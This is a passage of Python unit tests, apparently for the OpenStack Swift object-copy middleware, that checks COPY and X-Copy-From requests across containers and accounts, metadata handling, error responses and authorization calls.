status, headers, body = self.call_ssc(req) self.assertEqual(status, '404 Not Found') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_copy_not_found_reading_source_and_account(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {}) req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o', 'X-Copy-From-Account': 'a'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '404 Not Found') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_copy_with_object_metadata(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o', 'X-Object-Meta-Ours': 'okay'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o', path) self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay') self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_copy_with_object_metadata_and_account(self): self.app.register('GET', '/v1/a1/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o', 'X-Object-Meta-Ours': 'okay', 'X-Copy-From-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o', path) self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay') self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a1/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_copy_source_larger_than_max_file_size(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "largebody") req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o'}) with mock.patch('swift.common.middleware.copy.' 'MAX_FILE_SIZE', 1): status, headers, body = self.call_ssc(req) self.assertEqual(status, '413 Request Entity Too Large') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_basic_COPY(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, { 'etag': 'is sent'}, 'passed') self.app.register('PUT', '/v1/a/c/o-copy', swob.HTTPCreated, {}) req = Request.blank( '/v1/a/c/o', method='COPY', headers={'Content-Length': 0, 'Destination': 'c/o-copy'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o-copy', self.authorized[1].path) self.assertEqual(self.app.calls, [ ('GET', '/v1/a/c/o'), ('PUT', '/v1/a/c/o-copy')]) self.assertIn('etag', self.app.headers[1]) self.assertEqual(self.app.headers[1]['etag'], 'is sent') # For basic test cases, assert orig_req_method behavior self.assertEqual(req.environ['swift.orig_req_method'], 'COPY') def test_basic_DLO(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, { 'x-object-manifest': 'some/path', 'etag': 'is not sent'}, 'passed') self.app.register('PUT', '/v1/a/c/o-copy', swob.HTTPCreated, {}) req = Request.blank( '/v1/a/c/o', method='COPY', headers={'Content-Length': 0, 'Destination': 'c/o-copy'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(self.app.calls, [ ('GET', '/v1/a/c/o'), ('PUT', '/v1/a/c/o-copy')]) self.assertNotIn('x-object-manifest', self.app.headers[1]) self.assertNotIn('etag', self.app.headers[1]) def test_basic_DLO_manifest(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, { 'x-object-manifest': 'some/path', 'etag': 'is sent'}, 'passed') self.app.register('PUT', '/v1/a/c/o-copy', swob.HTTPCreated, {}) req = Request.blank( '/v1/a/c/o?multipart-manifest=get', method='COPY', headers={'Content-Length': 0, 'Destination': 'c/o-copy'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(2, len(self.app.calls)) self.assertEqual('GET', self.app.calls[0][0]) get_path, qs = self.app.calls[0][1].split('?') params = urllib.parse.parse_qs(qs) self.assertDictEqual( {'format': ['raw'], 'multipart-manifest': ['get']}, params) self.assertEqual(get_path, '/v1/a/c/o') self.assertEqual(self.app.calls[1], ('PUT', '/v1/a/c/o-copy')) self.assertIn('x-object-manifest', self.app.headers[1]) self.assertEqual(self.app.headers[1]['x-object-manifest'], 'some/path') self.assertIn('etag', self.app.headers[1]) self.assertEqual(self.app.headers[1]['etag'], 'is sent') def test_COPY_source_metadata(self): source_headers = { 'x-object-sysmeta-test1': 'copy me', 'x-object-meta-test2': 'copy me too', 'x-object-transient-sysmeta-test3': 'ditto', 'x-object-sysmeta-container-update-override-etag': 'etag val', 'x-object-sysmeta-container-update-override-size': 'size val', 'x-object-sysmeta-container-update-override-foo': 'bar', 'x-delete-at': 'delete-at-time'} get_resp_headers = source_headers.copy() get_resp_headers['etag'] = 'source etag' self.app.register( 'GET', '/v1/a/c/o', swob.HTTPOk, headers=get_resp_headers, body='passed') def verify_headers(expected_headers, unexpected_headers, actual_headers): for k, v in actual_headers: if k.lower() in expected_headers: expected_val = expected_headers.pop(k.lower()) self.assertEqual(expected_val, v) self.assertNotIn(k.lower(), unexpected_headers) self.assertFalse(expected_headers) # use a COPY request self.app.register('PUT', '/v1/a/c/o-copy0', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', method='COPY', headers={'Content-Length': 0, 'Destination': 'c/o-copy0'}) status, resp_headers, body = self.call_ssc(req) self.assertEqual('201 Created', status) verify_headers(source_headers.copy(), [], resp_headers) method, path, put_headers = self.app.calls_with_headers[-1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o-copy0', path) verify_headers(source_headers.copy(), [], put_headers.items()) self.assertIn('etag', put_headers) self.assertEqual(put_headers['etag'], 'source etag') req = Request.blank('/v1/a/c/o-copy0', method='GET') status, resp_headers, body = self.call_ssc(req) self.assertEqual('200 OK', status) verify_headers(source_headers.copy(), [], resp_headers) # use a COPY request with a Range header self.app.register('PUT', '/v1/a/c/o-copy1', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', method='COPY', headers={'Content-Length': 0, 'Destination': 'c/o-copy1', 'Range': 'bytes=1-2'}) status, resp_headers, body = self.call_ssc(req) expected_headers = source_headers.copy() unexpected_headers = ( 'x-object-sysmeta-container-update-override-etag', 'x-object-sysmeta-container-update-override-size', 'x-object-sysmeta-container-update-override-foo') for h in unexpected_headers: expected_headers.pop(h) self.assertEqual('201 Created', status) verify_headers(expected_headers, unexpected_headers, resp_headers) method, path, put_headers = self.app.calls_with_headers[-1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o-copy1', path) verify_headers( expected_headers, unexpected_headers, put_headers.items()) # etag should not be copied with a Range request self.assertNotIn('etag', put_headers) req = Request.blank('/v1/a/c/o-copy1', method='GET') status, resp_headers, body = self.call_ssc(req) self.assertEqual('200 OK', status) verify_headers(expected_headers, unexpected_headers, resp_headers) # use a PUT with x-copy-from self.app.register('PUT', '/v1/a/c/o-copy2', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o-copy2', method='PUT', headers={'Content-Length': 0, 'X-Copy-From': 'c/o'}) status, resp_headers, body = self.call_ssc(req) self.assertEqual('201 Created', status) verify_headers(source_headers.copy(), [], resp_headers) method, path, put_headers = self.app.calls_with_headers[-1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o-copy2', path) verify_headers(source_headers.copy(), [], put_headers.items()) self.assertIn('etag', put_headers) self.assertEqual(put_headers['etag'], 'source etag') req = Request.blank('/v1/a/c/o-copy2', method='GET') status, resp_headers, body = self.call_ssc(req) self.assertEqual('200 OK', status) verify_headers(source_headers.copy(), [], resp_headers) # copy to same path as source self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', method='PUT', headers={'Content-Length': 0, 'X-Copy-From': 'c/o'}) status, resp_headers, body = self.call_ssc(req) self.assertEqual('201 Created', status) verify_headers(source_headers.copy(), [], resp_headers) method, path, put_headers = self.app.calls_with_headers[-1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o', path) verify_headers(source_headers.copy(), [], put_headers.items()) self.assertIn('etag', put_headers) self.assertEqual(put_headers['etag'], 'source etag') def test_COPY_no_destination_header(self): req = Request.blank( '/v1/a/c/o', method='COPY', headers={'Content-Length': 0}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') self.assertEqual(len(self.authorized), 0) def test_basic_COPY_account(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o2', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': 'c1/o2', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o', path) method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a1/c1/o2', path) self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o2', self.authorized[1].path) def test_COPY_across_containers(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c2/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': 'c2/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c2/o', self.authorized[1].path) def test_COPY_source_with_slashes_in_name(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o/o2', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': 'c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o', path) self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_COPY_account_source_with_slashes_in_name(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o/o2', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': 'c1/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a1/c1/o', path) self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_COPY_destination_leading_slash(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_COPY_account_destination_leading_slash(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a1/c1/o', path) self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_COPY_source_with_slashes_destination_leading_slash(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o/o2', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o', path) self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_COPY_account_source_with_slashes_destination_leading_slash(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o/o2', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a1/c1/o', path) self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_COPY_no_object_in_destination(self): req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': 'c_o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') def test_COPY_account_no_object_in_destination(self): req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': 'c_o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') def test_COPY_account_bad_destination_account(self): req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o', 'Destination-Account': '/i/am/bad'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') def test_COPY_server_error_reading_source(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '503 Service Unavailable') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_account_server_error_reading_source(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '503 Service Unavailable') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_not_found_reading_source(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '404 Not Found') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_account_not_found_reading_source(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '404 Not Found') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_with_metadata(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "passed") self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o', 'X-Object-Meta-Ours': 'okay'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o', path) self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay') self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_COPY_account_with_metadata(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "passed") self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'X-Object-Meta-Ours': 'okay', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a1/c1/o', path) self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay') self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_COPY_source_zero_content_length(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, None) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '413 Request Entity Too Large') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_source_larger_than_max_file_size(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "largebody") req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) with mock.patch('swift.common.middleware.copy.' 'MAX_FILE_SIZE', 1): status, headers, body = self.call_ssc(req) self.assertEqual(status, '413 Request Entity Too Large') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_account_source_zero_content_length(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, None) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '413 Request Entity Too Large') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_account_source_larger_than_max_file_size(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "largebody") req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'Destination-Account': 'a1'}) with mock.patch('swift.common.middleware.copy.' 'MAX_FILE_SIZE', 1): status, headers, body = self.call_ssc(req) self.assertEqual(status, '413 Request Entity Too Large') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_newest(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {'Last-Modified': '123'}, "passed") self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From-Last-Modified', '123') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_COPY_account_newest(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {'Last-Modified': '123'}, "passed") self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From-Last-Modified', '123') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_COPY_in_OPTIONS_response(self): self.app.register('OPTIONS', '/v1/a/c/o', swob.HTTPOk, {'Allow': 'GET, PUT'}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'OPTIONS'}, headers={}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '200 OK') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('OPTIONS', method) self.assertEqual('/v1/a/c/o', path) self.assertTrue(('Allow', 'GET, PUT, COPY') in headers) self.assertEqual(len(self.authorized), 1) self.assertEqual('OPTIONS', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) # For basic test cases, assert orig_req_method behavior self.assertNotIn('swift.orig_req_method', req.environ) def test_COPY_in_OPTIONS_response_CORS(self): self.app.register('OPTIONS', '/v1/a/c/o', swob.HTTPOk, {'Allow': 'GET, PUT', 'Access-Control-Allow-Methods': 'GET, PUT'}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'OPTIONS'}, headers={}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '200 OK') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('OPTIONS', method) self.assertEqual('/v1/a/c/o', path) self.assertTrue(('Allow', 'GET, PUT, COPY') in headers) self.assertTrue(('Access-Control-Allow-Methods', 'GET, PUT, COPY') in headers) self.assertEqual(len(self.authorized), 1) self.assertEqual('OPTIONS', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def _test_COPY_source_headers(self, extra_put_headers): # helper method to perform a COPY with some metadata headers that # should always be sent to the destination put_headers = {'Destination': '/c1/o', 'X-Object-Meta-Test2': 'added', 'X-Object-Sysmeta-Test2': 'added', 'X-Object-Transient-Sysmeta-Test2': 'added'} put_headers.update(extra_put_headers) get_resp_headers = { 'X-Timestamp': '1234567890.12345', 'X-Backend-Timestamp': '1234567890.12345', 'Content-Type': 'text/original', 'Content-Encoding': 'gzip', 'Content-Disposition': 'attachment; filename=myfile', 'X-Object-Meta-Test': 'original', 'X-Object-Sysmeta-Test': 'original', 'X-Object-Transient-Sysmeta-Test': 'original', 'X-Foo': 'Bar'} self.app.register( 'GET', '/v1/a/c/o', swob.HTTPOk, headers=get_resp_headers) self.app.register('PUT', '/v1/a/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', method='COPY', headers=put_headers) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers self.assertEqual(2, len(calls)) method, path, req_headers = calls[1] self.assertEqual('PUT', method) # these headers should always be applied to the destination self.assertEqual('added', req_headers.get('X-Object-Meta-Test2')) self.assertEqual('added', req_headers.get('X-Object-Sysmeta-Test2')) self.assertEqual('added', req_headers.get('X-Object-Transient-Sysmeta-Test2')) return req_headers def test_COPY_source_headers_no_updates(self): # copy should preserve existing metadata if not updated req_headers = self._test_COPY_source_headers({}) self.assertEqual('text/original', req_headers.get('Content-Type')) self.assertEqual('gzip', req_headers.get('Content-Encoding')) self.assertEqual('attachment; filename=myfile', req_headers.get('Content-Disposition')) self.assertEqual('original', req_headers.get('X-Object-Meta-Test')) self.assertEqual('original', req_headers.get('X-Object-Sysmeta-Test')) self.assertEqual('original', req_headers.get('X-Object-Transient-Sysmeta-Test')) self.assertEqual('Bar', req_headers.get('X-Foo')) self.assertNotIn('X-Timestamp', req_headers) self.assertNotIn('X-Backend-Timestamp', req_headers) def test_COPY_source_headers_with_updates(self): # copy should apply any updated values to existing metadata put_headers = { 'Content-Type': 'text/not_original', 'Content-Encoding': 'not_gzip', 'Content-Disposition': 'attachment; filename=notmyfile', 'X-Object-Meta-Test': 'not_original', 'X-Object-Sysmeta-Test': 'not_original', 'X-Object-Transient-Sysmeta-Test': 'not_original', 'X-Foo': 'Not Bar'} req_headers = self._test_COPY_source_headers(put_headers) self.assertEqual('text/not_original', req_headers.get('Content-Type')) self.assertEqual('not_gzip', req_headers.get('Content-Encoding')) self.assertEqual('attachment; filename=notmyfile', req_headers.get('Content-Disposition')) self.assertEqual('not_original', req_headers.get('X-Object-Meta-Test')) self.assertEqual('not_original', req_headers.get('X-Object-Sysmeta-Test')) self.assertEqual('not_original', req_headers.get('X-Object-Transient-Sysmeta-Test')) self.assertEqual('Not Bar', req_headers.get('X-Foo')) self.assertNotIn('X-Timestamp', req_headers) self.assertNotIn('X-Backend-Timestamp', req_headers) def test_COPY_x_fresh_metadata_no_updates(self): # existing user metadata should not be copied, sysmeta is copied put_headers = { 'X-Fresh-Metadata': 'true', 'X-Extra': 'Fresh'} req_headers = self._test_COPY_source_headers(put_headers) self.assertEqual('text/original', req_headers.get('Content-Type')) self.assertEqual('Fresh', req_headers.get('X-Extra')) self.assertEqual('original', req_headers.get('X-Object-Sysmeta-Test')) self.assertIn('X-Fresh-Metadata', req_headers) self.assertNotIn('X-Object-Meta-Test', req_headers) self.assertNotIn('X-Object-Transient-Sysmeta-Test', req_headers) self.assertNotIn('X-Timestamp', req_headers) self.assertNotIn('X-Backend-Timestamp', req_headers) self.assertNotIn('Content-Encoding', req_headers) self.assertNotIn('Content-Disposition', req_headers) self.assertNotIn('X-Foo', req_headers) def test_COPY_x_fresh_metadata_with_updates(self): # existing user metadata should not be copied, new metadata replaces it put_headers = { 'X-Fresh-Metadata': 'true', 'Content-Type': 'text/not_original', 'Content-Encoding': 'not_gzip', 'Content-Disposition': 'attachment; filename=notmyfile', 'X-Object-Meta-Test': 'not_original', 'X-Object-Sysmeta-Test': 'not_original', 'X-Object-Transient-Sysmeta-Test': 'not_original', 'X-Foo': 'Not Bar', 'X-Extra': 'Fresh'} req_headers = self._test_COPY_source_headers(put_headers) self.assertEqual('Fresh', req_headers.get('X-Extra')) 